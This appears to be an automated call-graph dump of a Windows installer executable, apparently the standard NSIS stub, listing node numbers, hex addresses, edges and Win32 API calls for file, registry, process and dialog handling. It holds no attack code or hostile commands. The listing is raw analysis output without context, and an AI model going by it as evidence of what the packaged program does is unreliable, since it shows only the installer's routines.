3541 403b52 3542 403ca5 3541->3542 3543 403b6a 3541->3543 3545 403cb6 GetDlgItem GetDlgItem 3542->3545 3554 403cf6 3542->3554 3543->3542 3544 403b76 3543->3544 3546 403b81 SetWindowPos 3544->3546 3547 403b94 3544->3547 3548 404026 18 API calls 3545->3548 3546->3547 3551 403bb1 3547->3551 3552 403b99 ShowWindow 3547->3552 3553 403ce0 SetClassLongA 3548->3553 3549 403d50 3550 404072 SendMessageA 3549->3550 3560 403ca0 3549->3560 3600 403d62 3550->3600 3555 403bd3 3551->3555 3556 403bb9 DestroyWindow 3551->3556 3552->3551 3557 40140b 2 API calls 3553->3557 3554->3549 3558 401389 2 API calls 3554->3558 3562 403bd8 SetWindowLongA 3555->3562 3563 403be9 3555->3563 3561 403faf 3556->3561 3557->3554 3559 403d28 3558->3559 3559->3549 3564 403d2c SendMessageA 3559->3564 3561->3560 3570 403fe0 ShowWindow 3561->3570 3562->3560 3567 403c60 3563->3567 3568 403bf5 GetDlgItem 3563->3568 3564->3560 3565 40140b 2 API calls 3565->3600 3566 403fb1 DestroyWindow EndDialog 3566->3561 3569 40408d 8 API calls 3567->3569 3571 403c25 3568->3571 3572 403c08 SendMessageA IsWindowEnabled 3568->3572 3569->3560 3570->3560 3574 403c32 3571->3574 3575 403c79 SendMessageA 3571->3575 3576 403c45 3571->3576 3583 403c2a 3571->3583 3572->3560 3572->3571 3573 405f87 17 API calls 3573->3600 3574->3575 3574->3583 3575->3567 3579 403c62 3576->3579 3580 403c4d 3576->3580 3577 403fff SendMessageA 3577->3567 3578 404026 18 API calls 3578->3600 3582 40140b 2 API calls 3579->3582 3581 40140b 2 API calls 3580->3581 3581->3583 3582->3583 3583->3567 3583->3577 3584 404026 18 API calls 3585 403ddd GetDlgItem 3584->3585 3586 403df2 3585->3586 3587 403dfa ShowWindow EnableWindow 3585->3587 3586->3587 3610 404048 EnableWindow 3587->3610 3589 403e24 EnableWindow 3594 403e38 3589->3594 3590 403e3d GetSystemMenu EnableMenuItem SendMessageA 3591 403e6d SendMessageA 3590->3591 3590->3594 3591->3594 3593 403b33 18 API calls 3593->3594 3594->3590 3594->3593 3611 40405b SendMessageA 3594->3611 3612 405f65 lstrcpynA 3594->3612 3596 403e9c lstrlenA 3597 405f87 17 API calls 3596->3597 3598 403ead SetWindowTextA 3597->3598 3599 401389 2 API calls 3598->3599 3599->3600 3600->3560 3600->3565 3600->3566 3600->3573 3600->3578 3600->3584 3601 403ef1 DestroyWindow 3600->3601 3601->3561 3602 403f0b CreateDialogParamA 3601->3602 3602->3561 3603 403f3e 3602->3603 3604 404026 18 API calls 3603->3604 3605 403f49 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3604->3605 3606 401389 2 API calls 3605->3606 3607 403f8f 3606->3607 3607->3560 3608 403f97 ShowWindow 3607->3608 3609 404072 SendMessageA 3608->3609 3609->3561 3610->3589 3611->3594 3612->3596 3613 401cd4 3614 402a9f 17 API calls 3613->3614 3615 401cda IsWindow 3614->3615 3616 401a0e 3615->3616 3617 4014d6 3618 402a9f 17 API calls 3617->3618 3619 4014dc Sleep 3618->3619 3621 402951 3619->3621 3279 401759 3280 402ac1 17 API calls 3279->3280 3281 401760 3280->3281 3282 401786 3281->3282 3283 40177e 3281->3283 3319 405f65 lstrcpynA 3282->3319 3318 405f65 lstrcpynA 3283->3318 3286 401784 3290 4061cf 5 API calls 3286->3290 3287 401791 3288 4058fd 3 API calls 3287->3288 3289 401797 lstrcatA 3288->3289 3289->3286 3307 4017a3 3290->3307 3291 406268 2 API calls 3291->3307 3292 405ad9 2 API calls 3292->3307 3294 4017ba CompareFileTime 3294->3307 3295 40187e 3296 40508c 24 API calls 3295->3296 3299 401888 3296->3299 3297 40508c 24 API calls 3300 40186a 3297->3300 3298 405f65 lstrcpynA 3298->3307 3301 402f81 31 API calls 3299->3301 3302 40189b 3301->3302 3303 4018af SetFileTime 3302->3303 3304 4018c1 FindCloseChangeNotification 3302->3304 3303->3304 3304->3300 3306 4018d2 3304->3306 3305 405f87 17 API calls 3305->3307 3308 4018d7 3306->3308 3309 4018ea 3306->3309 3307->3291 3307->3292 3307->3294 3307->3295 3307->3298 3307->3305 3313 405681 MessageBoxIndirectA 3307->3313 3315 401855 3307->3315 3317 405afe GetFileAttributesA CreateFileA 3307->3317 3310 405f87 17 API calls 3308->3310 3311 405f87 17 API calls 3309->3311 3312 4018df lstrcatA 3310->3312 3314 4018f2 3311->3314 3312->3314 3313->3307 3316 405681 MessageBoxIndirectA 3314->3316 3315->3297 3315->3300 3316->3300 3317->3307 3318->3286 3319->3287 3622 401659 3623 402ac1 17 API calls 3622->3623 3624 40165f 3623->3624 3625 406268 2 API calls 3624->3625 3626 401665 3625->3626 3627 401959 3628 402a9f 17 API calls 3627->3628 3629 401960 3628->3629 3630 402a9f 17 API calls 3629->3630 3631 40196d 3630->3631 3632 402ac1 17 API calls 3631->3632 3633 401984 lstrlenA 3632->3633 3634 401994 3633->3634 3635 4019d4 3634->3635 3639 405f65 lstrcpynA 3634->3639 3637 4019c4 3637->3635 3638 4019c9 lstrlenA 3637->3638 3638->3635 3639->3637 3324 4036db 3325 4036f3 3324->3325 3326 4036e5 CloseHandle 3324->3326 3331 403720 3325->3331 3326->3325 3329 40572d 67 API calls 3330 403704 3329->3330 3332 40372e 3331->3332 3333 4036f8 3332->3333 3334 403733 FreeLibrary GlobalFree 3332->3334 3333->3329 3334->3333 3334->3334 3640 401f5b 3641 402ac1 17 API calls 3640->3641 3642 401f62 3641->3642 3643 4062fd 5 API calls 3642->3643 3644 401f71 3643->3644 3645 401ff1 3644->3645 3646 401f89 GlobalAlloc 3644->3646 3646->3645 3647 401f9d 3646->3647 3648 4062fd 5 API calls 3647->3648 3649 401fa4 3648->3649 3650 4062fd 5 API calls 3649->3650 3651 401fae 3650->3651 3651->3645 3655 405ec3 wsprintfA 3651->3655 3653 401fe5 3656 405ec3 wsprintfA 3653->3656 3655->3653 3656->3645 3657 40255b 3658 402ac1 17 API calls 3657->3658 3659 402562 3658->3659 3662 405afe GetFileAttributesA CreateFileA 3659->3662 3661 40256e 3662->3661 3663 401a5e 3664 402a9f 17 API calls 3663->3664 3665 401a64 3664->3665 3666 402a9f 17 API calls 3665->3666 3667 401a0e 3666->3667 3668 4024df 3678 402b01 3668->3678 3671 402a9f 17 API calls 3672 4024f2 3671->3672 3673 402519 RegEnumValueA 3672->3673 3674 40250d RegEnumKeyA 3672->3674 3676 402716 3672->3676 3675 40252e RegCloseKey 3673->3675 3674->3675 3675->3676 3679 402ac1 17 API calls 3678->3679 3680 402b18 3679->3680 3681 405deb RegOpenKeyExA 3680->3681 3682 4024e9 3681->3682 3682->3671 3683 402c61 3684 402c70 SetTimer 3683->3684 3685 402c89 3683->3685 3684->3685 3686 402cde 3685->3686 3687 402ca3 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3685->3687 3687->3686 3688 401563 3689 4028f9 3688->3689 3692 405ec3 wsprintfA 3689->3692 3691 4028fe 3692->3691 3693 4047e7 3694 404813 3693->3694 3695 4047f7 3693->3695 3697 404846 3694->3697 3698 404819 SHGetPathFromIDListA 3694->3698 3704 405665 GetDlgItemTextA 3695->3704 3700 404829 3698->3700 3703 404830 SendMessageA 3698->3703 3699 404804 SendMessageA 3699->3694 3701 40140b 2 API calls 3700->3701 3701->3703 3703->3697 3704->3699 3705 40166a 3706 402ac1 17 API calls 3705->3706 3707 401671 3706->3707 3708 402ac1 17 API calls 3707->3708 3709 40167a 3708->3709 3710 402ac1 17 API calls 3709->3710 3711 401683 MoveFileA 3710->3711 3712 401696 3711->3712 3713 40168f 3711->3713 3715 406268 2 API calls 3712->3715 3717 40223c 3712->3717 3714 401423 24 API calls 3713->3714 3714->3717 3716 4016a5 3715->3716 3716->3717 3718 405d44 36 API calls 3716->3718 3718->3713 3719 40246d 3720 402b01 17 API calls 3719->3720 3721 402477 3720->3721 3722 402ac1 17 API calls 3721->3722 3723 402480 3722->3723 3724 40248a RegQueryValueExA 3723->3724 3727 402716 3723->3727 3725 4024b0 RegCloseKey 3724->3725 3726 4024aa 3724->3726 3725->3727 3726->3725 3730 405ec3 wsprintfA 3726->3730 3730->3725 3731 4019ed 3732 402ac1 17 API calls 3731->3732 3733 4019f4 3732->3733 3734 402ac1 17 API calls 3733->3734 3735 4019fd 3734->3735 3736 401a04 lstrcmpiA 3735->3736 3737 401a16 lstrcmpA 3735->3737 3738 401a0a 3736->3738 3737->3738 3739 40416f 3740 404185 3739->3740 3745 404291 3739->3745 3742 404026 18 API calls 3740->3742 3741 404300 3743 4043ca 3741->3743 3744 40430a GetDlgItem 3741->3744 3746 4041db 3742->3746 3750 40408d 8 API calls 3743->3750 3747 404320 3744->3747 3748 404388 3744->3748 3745->3741 3745->3743 3751 4042d5 GetDlgItem SendMessageA 3745->3751 3749 404026 18 API calls 3746->3749 3747->3748 3754 404346 SendMessageA LoadCursorA SetCursor 3747->3754 3748->3743 3755 40439a 3748->3755 3752 4041e8 CheckDlgButton 3749->3752 3753 4043c5 3750->3753 3772 404048 EnableWindow 3751->3772 3770 404048 EnableWindow 3752->3770 3776 404413 3754->3776 3760 4043a0 SendMessageA 3755->3760 3761 4043b1 3755->3761 3757 4042fb 3773 4043ef 3757->3773 3760->3761 3761->3753 3765 4043b7 SendMessageA 3761->3765 3763 404206 GetDlgItem 3771 40405b SendMessageA 3763->3771 3765->3753 3767 40421c SendMessageA 3768 404243 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3767->3768 3769 40423a GetSysColor 3767->3769 3768->3753 3769->3768 3770->3763 3771->3767 3772->3757 3774 404402 SendMessageA 3773->3774 3775 4043fd 3773->3775 3774->3741 3775->3774 3779 405647 ShellExecuteExA 3776->3779 3778 404379 LoadCursorA SetCursor 3778->3748 3779->3778 3780 40156f 3781 401586 3780->3781 3782 40157f ShowWindow 3780->3782 3783 402951 3781->3783 3784 401594 ShowWindow 3781->3784 3782->3781 3784->3783 2785 4031f1 SetErrorMode GetVersion 2786 403232 2785->2786 2787 403238 2785->2787 2788 4062fd 5 API calls 2786->2788 2876 40628f GetSystemDirectoryA 2787->2876 2788->2787 2790 40324e lstrlenA 2790->2787 2791 40325d 2790->2791 2879 4062fd GetModuleHandleA 2791->2879 2794 4062fd 5 API calls 2795 40326b 2794->2795 2796 4062fd 5 API calls 2795->2796 2797 403277 #17 OleInitialize SHGetFileInfoA 2796->2797 2885 405f65 lstrcpynA 2797->2885 2800 4032c3 GetCommandLineA 2886 405f65 lstrcpynA 2800->2886 2802 4032d5 GetModuleHandleA 2803 4032ec 2802->2803 2887 405928 2803->2887 2806 4033da 2807 4033ed GetTempPathA 2806->2807 2891 4031c0 2807->2891 2809 403405 2811 403409 GetWindowsDirectoryA lstrcatA 2809->2811 2812 40345f DeleteFileA 2809->2812 2810 403310 2810->2806 2813 405928 CharNextA 2810->2813 2817 4033dc 2810->2817 2814 4031c0 12 API calls 2811->2814 2901 402d48 GetTickCount GetModuleFileNameA 2812->2901 2813->2810 2816 403425 2814->2816 2816->2812 2821 403429 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 2816->2821 2986 405f65 lstrcpynA 2817->2986 2818 403473 2819 40350d ExitProcess OleUninitialize 2818->2819 2826 405928 CharNextA 2818->2826 2860 4034f9 2818->2860 2822 403641 2819->2822 2823 403523 2819->2823 2824 4031c0 12 API calls 2821->2824 2828 4036c3 ExitProcess 2822->2828 2829 403649 GetCurrentProcess OpenProcessToken 2822->2829 3003 405681 2823->3003 2830 403457 2824->2830 2840 40348e 2826->2840 2834 403694 2829->2834 2835 403664 LookupPrivilegeValueA AdjustTokenPrivileges 2829->2835 2830->2812 2830->2819 2836 4062fd 5 API calls 2834->2836 2835->2834 2839 40369b 2836->2839 2837 4034d4 2987 4059eb 2837->2987 2838 403539 3007 4055ec 2838->3007 2843 4036b0 ExitWindowsEx 2839->2843 2844 4036bc 2839->2844 2840->2837 2840->2838 2843->2828 2843->2844 3045 40140b 2844->3045 2848 40355a lstrcatA lstrcmpiA 2848->2819 2850 403576 2848->2850 2849 40354f lstrcatA 2849->2848 2852 403582 2850->2852 2853 40357b 2850->2853 3015 4055cf CreateDirectoryA 2852->3015 3010 405552 CreateDirectoryA 2853->3010 2854 4034ee 3002 405f65 lstrcpynA 2854->3002 2858 403587 SetCurrentDirectoryA 2861 4035a1 2858->2861 2862 403596 2858->2862 2929 4037b5 2860->2929 3019 405f65 lstrcpynA 2861->3019 3018 405f65 lstrcpynA 2862->3018 2867 4035ed CopyFileA 2873 4035af 2867->2873 2868 403635 2869 405d44 36 API calls 2868->2869 2871 40363c 2869->2871 2871->2819 2872 405f87 17 API calls 2872->2873 2873->2868 2873->2872 2875 403621 CloseHandle 2873->2875 3020 405f87 2873->3020 3037 405d44 MoveFileExA 2873->3037 3042 405604 CreateProcessA 2873->3042 2875->2873 2878 4062b1 wsprintfA LoadLibraryExA 2876->2878 2878->2790 2880 406323 GetProcAddress 2879->2880 2881 406319 2879->2881 2883 403264 2880->2883 2882 40628f 3 API calls 2881->2882 2884 40631f 2882->2884 2883->2794 2884->2880 2884->2883 2885->2800 2886->2802 2888 40592e 2887->2888 2889 403300 CharNextA 2888->2889 2890 405934 CharNextA 2888->2890 2889->2810 2890->2888 3048 4061cf 2891->3048 2893 4031d6 2893->2809 2894 4031cc 2894->2893 3057 4058fd lstrlenA CharPrevA 2894->3057 2897 4055cf 2 API calls 2898 4031e4 2897->2898 3060 405b2d 2898->3060 3064 405afe GetFileAttributesA CreateFileA 2901->3064 2903 402d88 2924 402d98 2903->2924 3065 405f65 lstrcpynA 2903->3065 2905 402dae 3066 405944 lstrlenA 2905->3066 2909 402dbf GetFileSize 2910 402ebb 2909->2910 2922 402dd6 2909->2922 3071 402ce4 2910->3071 2912 402ec4 2914 402ef4 GlobalAlloc 2912->2914 2912->2924 3106 4031a9 SetFilePointer 2912->3106 3082 4031a9 SetFilePointer 2914->3082 2916 402f27 2920 402ce4 6 API calls 2916->2920 2918 402edd 2921 403193 ReadFile 2918->2921 2919 402f0f 3083 402f81 2919->3083 2920->2924 2925 402ee8 2921->2925 2922->2910 2922->2916 2922->2924 2926 402ce4 6 API calls 2922->2926 3103 403193 2922->3103 2924->2818 2925->2914 2925->2924 2926->2922 2927 402f1b 2927->2924 2927->2927 2928 402f58 SetFilePointer 2927->2928 2928->2924 2930 4062fd 5 API calls 2929->2930 2931 4037c9 2930->2931 2932 4037e1 2931->2932 2933 4037cf GetUserDefaultUILanguage 2931->2933 3136 405e4c 2932->3136 3127 405ec3 wsprintfA 2933->3127 2936 4037df 3128 403a7a 2936->3128 2938 40382a lstrcatA 2938->2936 2939 405e4c 3 API calls 2939->2938 2942 4059eb 18 API calls 2943 40385c 2942->2943 2944 4038e5 2943->2944 2947 405e4c 3 API calls 2943->2947 2945 4059eb 18 API calls 2944->2945 2946 4038eb 2945->2946 2949 4038fb LoadImageA 2946->2949 2950 405f87 17 API calls 2946->2950 2948 403888 2947->2948 2948->2944 2953 4038a4 lstrlenA 2948->2953 2956 405928 CharNextA 2948->2956 2951 4039a1 2949->2951 2952 403922 RegisterClassA 2949->2952 2950->2949 2955 40140b 2 API calls 2951->2955 2954 403958 SystemParametersInfoA CreateWindowExA 2952->2954 2962 403509 2952->2962 2957 4038b2 lstrcmpiA 2953->2957 2958 4038d8 2953->2958 2954->2951 2961 4039a7 2955->2961 2959 4038a2 2956->2959 2957->2958 2960 4038c2 GetFileAttributesA 2957->2960 2963 4058fd 3 API calls 2958->2963 2959->2953 2964 4038ce 2960->2964 2961->2962 2965 403a7a 18 API calls 2961->2965 2962->2819 2966 4038de 2963->2966 2964->2958 2967 405944 2 API calls 2964->2967 2968 4039b8 2965->2968 3141 405f65 lstrcpynA 2966->3141 2967->2958 2970 4039c4 ShowWindow 2968->2970 2971 403a47 2968->2971 2973 40628f 3 API calls 2970->2973 3142 40515e OleInitialize 2971->3142 2974 4039dc 2973->2974 2976 4039ea GetClassInfoA 2974->2976 2979 40628f 3 API calls 2974->2979 2975 403a4d 2977 403a51 2975->2977 2978 403a69 2975->2978 2981 403a14 DialogBoxParamA 2976->2981 2982 4039fe GetClassInfoA RegisterClassA 2976->2982 2977->2962 2984 40140b 2 API calls 2977->2984 2980 40140b 2 API calls 2978->2980 2979->2976 2980->2962 2983 40140b 2 API calls 2981->2983 2982->2981 2985 403a3c 2983->2985 2984->2962 2985->2962 2986->2807 3164 405f65 lstrcpynA 2987->3164 2989 4059fc 3165 405996 CharNextA CharNextA 2989->3165 2992 4034df 2992->2819 3001 405f65 lstrcpynA 2992->3001 2993 4061cf 5 API calls 2999 405a12 2993->2999 2994 405a3d lstrlenA 2995 405a48 2994->2995 2994->2999 2997 4058fd 3 API calls 2995->2997 2998 405a4d GetFileAttributesA 2997->2998 2998->2992 2999->2992 2999->2994 3000 405944 2 API calls 2999->3000 3171 406268 FindFirstFileA 2999->3171 3000->2994 3001->2854 3002->2860 3004 405696 3003->3004 3005 403531 ExitProcess 3004->3005 3006 4056aa MessageBoxIndirectA 3004->3006 3006->3005 3008 4062fd 5 API calls 3007->3008 3009 40353e lstrcatA 3008->3009 3009->2848 3009->2849 3011 4055a3 GetLastError 3010->3011 3012 403580 3010->3012 3011->3012 3013 4055b2 SetFileSecurityA 3011->3013 3012->2858 3013->3012 3014 4055c8 GetLastError 3013->3014 3014->3012 3016 4055e3 GetLastError 3015->3016 3017 4055df 3015->3017 3016->3017 3017->2858 3018->2861 3019->2873 3021 405f94 3020->3021 3022 4061b6 3021->3022 3025 406190 lstrlenA 3021->3025 3026 405f87 10 API calls 3021->3026 3029 4060ac GetSystemDirectoryA 3021->3029 3030 405e4c 3 API calls 3021->3030 3031 4060bf GetWindowsDirectoryA 3021->3031 3032 4061cf 5 API calls 3021->3032 3033 405f87 10 API calls 3021->3033 3034 406139 lstrcatA 3021->3034 3035 4060f3 SHGetSpecialFolderLocation 3021->3035 3174 405ec3 wsprintfA 3021->3174 3175 405f65 lstrcpynA 3021->3175 3023 4035e0 DeleteFileA 3022->3023 3176 405f65 lstrcpynA 3022->3176 3023->2867 3023->2873 3025->3021 3026->3025 3029->3021 3030->3021 3031->3021 3032->3021 3033->3021 3034->3021 3035->3021 3036 40610b SHGetPathFromIDListA CoTaskMemFree 3035->3036 3036->3021 3038 405d67 3037->3038 3039 405d58 3037->3039 3038->2873 3177 405bd4 3039->3177 3043 405643 3042->3043 3044 405637 CloseHandle 3042->3044 3043->2873 3044->3043 3046 401389 2 API calls 3045->3046 3047 401420 3046->3047 3047->2828 3055 4061db 3048->3055 3049 406243 3050 406247 CharPrevA 3049->3050 3053 406262 3049->3053 3050->3049 3051 406238 CharNextA 3051->3049 3051->3055 3052 405928 CharNextA 3052->3055 3053->2894 3054 406226 CharNextA 3054->3055 3055->3049 3055->3051 3055->3052 3055->3054 3056 406233 CharNextA 3055->3056 3056->3051 3058 4031de 3057->3058 3059 405917 lstrcatA 3057->3059 3058->2897 3059->3058 3061 405b38 GetTickCount GetTempFileNameA 3060->3061 3062 4031ef 3061->3062 3063 405b65 3061->3063 3062->2809 3063->3061 3063->3062 3064->2903 3065->2905 3067 405951 3066->3067 3068 402db4 3067->3068 3069 405956 CharPrevA 3067->3069 3070 405f65 lstrcpynA 3068->3070 3069->3067 3069->3068 3070->2909 3072 402d05 3071->3072 3073 402ced 3071->3073 3076 402d15 GetTickCount 3072->3076 3077 402d0d 3072->3077 3074 402cf6 DestroyWindow 3073->3074 3075 402cfd 3073->3075 3074->3075 3075->2912 3078 402d23 CreateDialogParamA ShowWindow 3076->3078 3079 402d46 3076->3079 3107 406339 3077->3107 3078->3079 3079->2912 3082->2919 3085 402f97 3083->3085 3084 402fc5 3087 403193 ReadFile 3084->3087 3085->3084 3113 4031a9 SetFilePointer 3085->3113 3088 402fd0 3087->3088 3089 402fe2 GetTickCount 3088->3089 3090 40312c 3088->3090 3092 403116 3088->3092 3089->3092 3099 403031 3089->3099 3091 40316e 3090->3091 3096 403130 3090->3096 3094 403193 ReadFile 3091->3094 3092->2927 3093 403193 ReadFile 3093->3099 3094->3092 3095 403193 ReadFile 3095->3096 3096->3092 3096->3095 3097 405ba5 WriteFile 3096->3097 3097->3096 3098 403087 GetTickCount 3098->3099 3099->3092 3099->3093 3099->3098 3100 4030ac MulDiv wsprintfA 3099->3100 3111 405ba5 WriteFile 3099->3111 3114 40508c 3100->3114 3125 405b76 ReadFile 3103->3125 3106->2918 3108 406356 PeekMessageA 3107->3108 3109 402d13 3108->3109 3110 40634c DispatchMessageA 3108->3110 3109->2912 3110->3108 3112 405bc3 3111->3112 3112->3099 3113->3084 3115 4050a7 3114->3115 3124 40514a 3114->3124 3116 4050c4 lstrlenA 3115->3116 3119 405f87 17 API calls 3115->3119 3117 4050d2 lstrlenA 3116->3117 3118 4050ed 3116->3118 3120 4050e4 lstrcatA 3117->3120 3117->3124 3121 405100 3118->3121 3122 4050f3 SetWindowTextA 3118->3122 3119->3116 3120->3118 3123 405106 SendMessageA SendMessageA SendMessageA 3121->3123 3121->3124 3122->3121 3123->3124 3124->3099 3126 4031a6 3125->3126 3126->2922 3127->2936 3129 403a8e 3128->3129 3149 405ec3 wsprintfA 3129->3149 3131 403aff 3150 403b33 3131->3150 3133 40383a 3133->2942 3134 403b04 3134->3133 3135 405f87 17 API calls 3134->3135 3135->3134 3153 405deb 3136->3153 3139 405e80 RegQueryValueExA RegCloseKey 3140 40380c 3139->3140 3140->2938 3140->2939 3141->2944 3157 404072 3142->3157 3144 404072 SendMessageA 3146 4051ba OleUninitialize 3144->3146 3145 405181 3148 4051a8 3145->3148 3160 401389 3145->3160 3146->2975 3148->3144 3149->3131 3151 405f87 17 API calls 3150->3151 3152 403b41 SetWindowTextA 3151->3152 3152->3134 3154 405dfa 3153->3154 3155 405e03 RegOpenKeyExA 3154->3155 3156 405dfe 3154->3156 3155->3156 3156->3139 3156->3140 3158 40408a 3157->3158 3159 40407b SendMessageA 3157->3159 3158->3145 3159->3158 3162 401390 3160->3162 3161 4013fe 3161->3145 3162->3161 3163 4013cb MulDiv SendMessageA 3162->3163 3163->3162 3164->2989 3166 4059c1 3165->3166 3167 4059b1 3165->3167 3169 405928 CharNextA 3166->3169 3170 4059e1 3166->3170 3167->3166 3168 4059bc CharNextA 3167->3168 3168->3170 3169->3166 3170->2992 3170->2993 3172 40627e FindClose 3171->3172 3173 406289 3171->3173 3172->3173 3173->2999 3174->3021 3175->3021 3176->3023 3178 405c20 GetShortPathNameA 3177->3178 3179 405bfa 3177->3179 3181 405c35 3178->3181 3182 405d3f 3178->3182 3204 405afe GetFileAttributesA CreateFileA 3179->3204 3181->3182 3184 405c3d wsprintfA 3181->3184 3182->3038 3183 405c04 CloseHandle GetShortPathNameA 3183->3182 3185 405c18 3183->3185 3186 405f87 17 API calls 3184->3186 3185->3178 3185->3182 3187 405c65 3186->3187 3205 405afe GetFileAttributesA CreateFileA 3187->3205 3189 405c72 3189->3182 3190 405c81 GetFileSize GlobalAlloc 3189->3190 3191 405ca3 3190->3191 3192 405d38 CloseHandle 3190->3192 3193 405b76 ReadFile 3191->3193 3192->3182 3194 405cab 3193->3194 3194->3192 3206 405a63 lstrlenA 3194->3206 3197 405cc2 lstrcpyA 3200 405ce4 3197->3200 3198 405cd6 3199 405a63 4 API calls 3198->3199 3199->3200 3201 405d1b SetFilePointer 3200->3201 3202 405ba5 WriteFile 3201->3202 3203 405d31 GlobalFree 3202->3203 3203->3192 3204->3183 3205->3189 3207 405aa4 lstrlenA 3206->3207 3208 405aac 3207->3208 3209 405a7d lstrcmpiA 3207->3209 3208->3197 3208->3198 3209->3208 3210 405a9b CharNextA 3209->3210 3210->3207 3785 406372 WaitForSingleObject 3786 40638c 3785->3786 3787 40639e GetExitCodeProcess 3786->3787 3788 406339 2 API calls 3786->3788 3789 406393 WaitForSingleObject 3788->3789 3789->3786 3790 403773 3791 40377e 3790->3791 3792 403785 GlobalAlloc 3791->3792 3793 403782 3791->3793 3792->3793 3794 4014f4 SetForegroundWindow 3795 402951 3794->3795 3796 401cf5 3797 402a9f 17 API calls 3796->3797 3798 401cfc 3797->3798 3799 402a9f 17 API calls 3798->3799 3800 401d08 GetDlgItem 3799->3800 3801 402577 3800->3801 3802 4022f6 3803 4022fe 3802->3803 3805 402304 3802->3805 3806 402ac1 17 API calls 3803->3806 3804 402314 3808 402322 3804->3808 3809 402ac1 17 API calls 3804->3809 3805->3804 3807 402ac1 17 API calls 3805->3807 3806->3805 3807->3804 3810 402ac1 17 API calls 3808->3810 3809->3808 3811 40232b WritePrivateProfileStringA 3810->3811 3812 4026f8 3813 402ac1 17 API calls 3812->3813 3814 4026ff FindFirstFileA 3813->3814 3815 402722 3814->3815 3819 402712 3814->3819 3816 402729 3815->3816 3820 405ec3 wsprintfA 3815->3820 3821 405f65 lstrcpynA 3816->3821 3820->3816 3821->3819 3822 40237b 3823 402382 3822->3823 3824 4023ad 3822->3824 3826 402b01 17 API calls 3823->3826 3825 402ac1 17 API calls 3824->3825 3827 4023b4 3825->3827 3828 402389 3826->3828 3833 402b7f 3827->3833 3830 4023c1 3828->3830 3831 402ac1 17 API calls 3828->3831 3832 40239a RegDeleteValueA RegCloseKey 3831->3832 3832->3830 3834 402b95 3833->3834 3835 402bab 3834->3835 3837 402bb4 3834->3837 3835->3830 3838 405deb RegOpenKeyExA 3837->3838 3840 402be2 3838->3840 3839 402c08 RegEnumKeyA 3839->3840 3841 402c1f RegCloseKey 3839->3841 3840->3839 3840->3841 3843 402c40 RegCloseKey 3840->3843 3845 402bb4 6 API calls 3840->3845 3847 402c33 3840->3847 3842 4062fd 5 API calls 3841->3842 3844 402c2f 3842->3844 3843->3847 3846 402c4e RegDeleteKeyA 3844->3846 3844->3847 3845->3840 3846->3847 3847->3835 3358 401ffd 3359 40200f 3358->3359 3369 4020bd 3358->3369 3360 402ac1 17 API calls 3359->3360 3362 402016 3360->3362 3361 401423 24 API calls 3367 40223c 3361->3367 3363 402ac1 17 API calls 3362->3363 3364 40201f 3363->3364 3365 402034 LoadLibraryExA 3364->3365 3366 402027 GetModuleHandleA 3364->3366 3368 402044 GetProcAddress 3365->3368 3365->3369 3366->3365 3366->3368 3370 402090 3368->3370 3371 402053 3368->3371 3369->3361 3372 40508c 24 API calls 3370->3372 3373 401423 24 API calls 3371->3373 3374 402063 3371->3374 3372->3374 3373->3374 3374->3367 3375 4020b1 FreeLibrary 3374->3375 3375->3367 3848 40257d 3849 402582 3848->3849 3850 402596 3848->3850 3851 402a9f 17 API calls 3849->3851 3852 402ac1 17 API calls 3850->3852 3854 40258b 3851->3854 3853 40259d lstrlenA 3852->3853 3853->3854 3855 4025bf 3854->3855 3856 405ba5 WriteFile 3854->3856 3856->3855 3857 4018fd 3858 401934 3857->3858 3859 402ac1 17 API calls 3858->3859 3860 401939 3859->3860 3861 40572d 67 API calls 3860->3861 3862 401942 3861->3862 3863 401000 3864 401037 BeginPaint GetClientRect 3863->3864 3865 40100c DefWindowProcA 3863->3865 3867 4010f3 3864->3867 3870 401179 3865->3870 3868 401073 CreateBrushIndirect FillRect DeleteObject 3867->3868 3869 4010fc 3867->3869 3868->3867 3871 401102 CreateFontIndirectA 3869->3871 3872 401167 EndPaint 3869->3872 3871->3872 3873 401112 6 API calls 3871->3873 3872->3870 3873->3872 3874 405000 3875 405010 3874->3875 3876 405024 3874->3876 3877 405016 3875->3877 3878 40506d 3875->3878 3879 40502c IsWindowVisible 3876->3879 3885 405043 3876->3885 3881 404072 SendMessageA 3877->3881 3880 405072 CallWindowProcA 3878->3880 3879->3878 3882 405039 3879->3882 3883 405020 3880->3883 3881->3883 3887 404957 SendMessageA 3882->3887 3885->3880 3892 4049d7 3885->3892 3888 4049b6 SendMessageA 3887->3888 3889 40497a GetMessagePos ScreenToClient SendMessageA 3887->3889 3891 4049ae 3888->3891 3890 4049b3 3889->3890 3889->3891 3890->3888 3891->3885 3901 405f65 lstrcpynA 3892->3901 3894 4049ea 3902 405ec3 wsprintfA 3894->3902 3896 4049f4 3897 40140b 2 API calls 3896->3897 3898 4049fd 3897->3898 3903 405f65 lstrcpynA 3898->3903 3900 404a04 3900->3878 3901->3894 3902->3896 3903->3900 3904 401900 3905 402ac1 17 API calls 3904->3905 3906 401907 3905->3906 3907 405681 MessageBoxIndirectA 3906->3907 3908 401910 3907->3908 3909 401502 3910 40150a 3909->3910 3912 40151d 3909->3912 3911 402a9f 17 API calls 3910->3911 3911->3912 3913 402682 3914 402689 3913->3914 3916 4028fe 3913->3916 3915 402a9f 17 API calls 3914->3915 3917 402690 3915->3917 3918 40269f SetFilePointer 3917->3918 3918->3916 3919 4026af 3918->3919 3921 405ec3 wsprintfA 3919->3921 3921->3916 3922 401c04 3923 402a9f 17 API calls 3922->3923 3924 401c0b 3923->3924 3925 402a9f 17 API calls 3924->3925 3926 401c18 3925->3926 3927 401c2d 3926->3927 3928 402ac1 17 API calls 3926->3928 3929 402ac1 17 API calls 3927->3929 3933 401c3d 3927->3933 3928->3927 3929->3933 3930 401c94 3932 402ac1 17 API calls 3930->3932 3931 401c48 3934 402a9f 17 API calls 3931->3934 3936 401c99 3932->3936 3933->3930 3933->3931 3935 401c4d 3934->3935 3937 402a9f 17 API calls 3935->3937 3938 402ac1 17 API calls 3936->3938 3939 401c59 3937->3939 3940 401ca2 FindWindowExA 3938->3940 3941 401c84 SendMessageA 3939->3941 3942 401c66 SendMessageTimeoutA 3939->3942 3943 401cc0 3940->3943 3941->3943 3942->3943 3320 401389 3322 401390 3320->3322 3321 4013fe 3322->3321 3323 4013cb MulDiv SendMessageA 3322->3323 3323->3322 3944 404a09 GetDlgItem GetDlgItem 